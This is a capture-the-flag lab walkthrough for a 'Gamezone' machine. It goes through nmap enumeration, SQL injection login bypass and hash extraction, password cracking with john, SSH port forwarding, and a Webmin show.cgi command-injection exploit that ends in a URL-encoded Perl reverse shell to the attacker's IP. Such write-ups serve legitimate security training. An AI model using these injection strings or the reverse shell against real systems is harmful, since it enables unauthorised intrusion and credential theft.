Gamezone
Difficulty: Eazy→Medium
Score: 4/10
Target
- 2 flags
- system privilege
Process
Enumeration
Runing Nmap
nmap -T4 -sV -A -oA Gamezone 10.10.192.4
output:
Nmap scan report for 10.10.79.249
Host is up (0.11s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 61:ea:89:f1:d4:a7:dc:a5:50:f7:6d:89:c3:af:0b:03 (RSA)
| 256 b3:7d:72:46:1e:d3:41:b6:6a:91:15:16:c9:4a:a5:fa (ECDSA)
|_ 256 53:67:09:dc:ff:fb:3a:3e:fb:fe:cf:d8:6d:41:27:ab (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Game Zone
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Apr 28 17:59:50 2020–1 IP address (1 host up) scanned in 40.81 secondsSince we have no credentials at the moment to bruteforce or login to SSH, we will just start to connect to the website running on port 80.
We can see the form of Login
Username: ' or 1=1 -- -
Password: plain
Username: admin
Password: ' or 1=1 -- -SQL injection
After that we login
We can use SQLMAP or manunal SQL injection, here I choose manual SQL injection.
' union select 1,2,3 — -
This is what is returned, the 1 you cant see, but its fine. We can work with this.
We now want to see what databases we can find in this mySQL.
' union select 1,2, schema_name FROM information_schema.schemata; — -
5 databases we get in return, the bad news is that like half of them are default. The good news is that db is most likely the one we actually need.
We are going to now try to get the tables that reside inside of the ‘db’ database
‘ union select 1,2, TABLE_NAME FROM information_schema.TABLES WHERE table_schema=’db’; — -
// Get tables name
‘ union select 1,table_name, column_name FROM information_schema.columns WHERE table_name = ‘users’ ; — -
// Get columns name
‘ union select 1, username , pwd from users; — -
Output:
agent47:ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218fxxxxxxxxxxxxWe can crash it by john or we can copy the hash to random website and see if works.
echo 'agent47:ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218fxxxxxxxxxxxx' > passwd.hash
john passwd.hash --wordlist=~/Desktop/rockyou.txtSSH login, Control and command
ssh [email protected]After we login in, to see what ports are listening
ss -tulpn
Firewall bypass
Reverse SSH port forwarding specifies that the given port on the remote server host is to be forwarded to the given host and port on the local side.
-L is a local tunnel (YOU <– CLIENT). If a site was blocked, you can forward the traffic to a server you own and view it. For example, if imgur was blocked at work, you can do **ssh -L 9000:imgur.com:80 **[email protected]**.** Going to localhost:9000 on your machine, will load imgur traffic using your other server.
**-R** is a remote tunnel (YOU –> CLIENT). You forward your traffic to the other server for others to view. Similar to the example above, but in reverse.
From our local machine, run ssh -L 10000:localhost:10000
ssh -L 10000:localhost:10000 [email protected]Now, what this does is put the victims port 10000 on your machine. You reach it by doing
Exploit
Going to that page we see a login, and using the same credentials we already have, we can log in just fine.
Digging into this exploit, I found the official documentation of it
http://www.americaninfosec.com/research/dossiers/AISG-12-001.pdf
The documentation shows that adding /file/show.cgi to the URL allows you to read file locations (as root) when adding a file past the ‘show.cgi’
We can use it to create the reverse shell
tcpdump -i tun0 icmp
http://localhost:10000/file/show.cgi/show.cgi/bin/A|ping%20-c%203%20<You IP address>|
Perl reverse shell
http://localhost:10000/file/show.cgi/bin/4uIPiqNld|perl%20-e%20'use%20Socket;$i=%2210.4.4.98%22;$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(%22tcp%22));if(connect(S,sockaddr_in($p,inet_aton($i))))%7Bopen(STDIN,%22%3E&S%22);open(STDOUT,%22%3E&S%22);open(STDERR,%22%3E&S%22);exec(%22/bin/sh%20-i%22);%7D;'|
We can also do that!
Next I know that the root flag is in the root directory, so I just went to it on the URL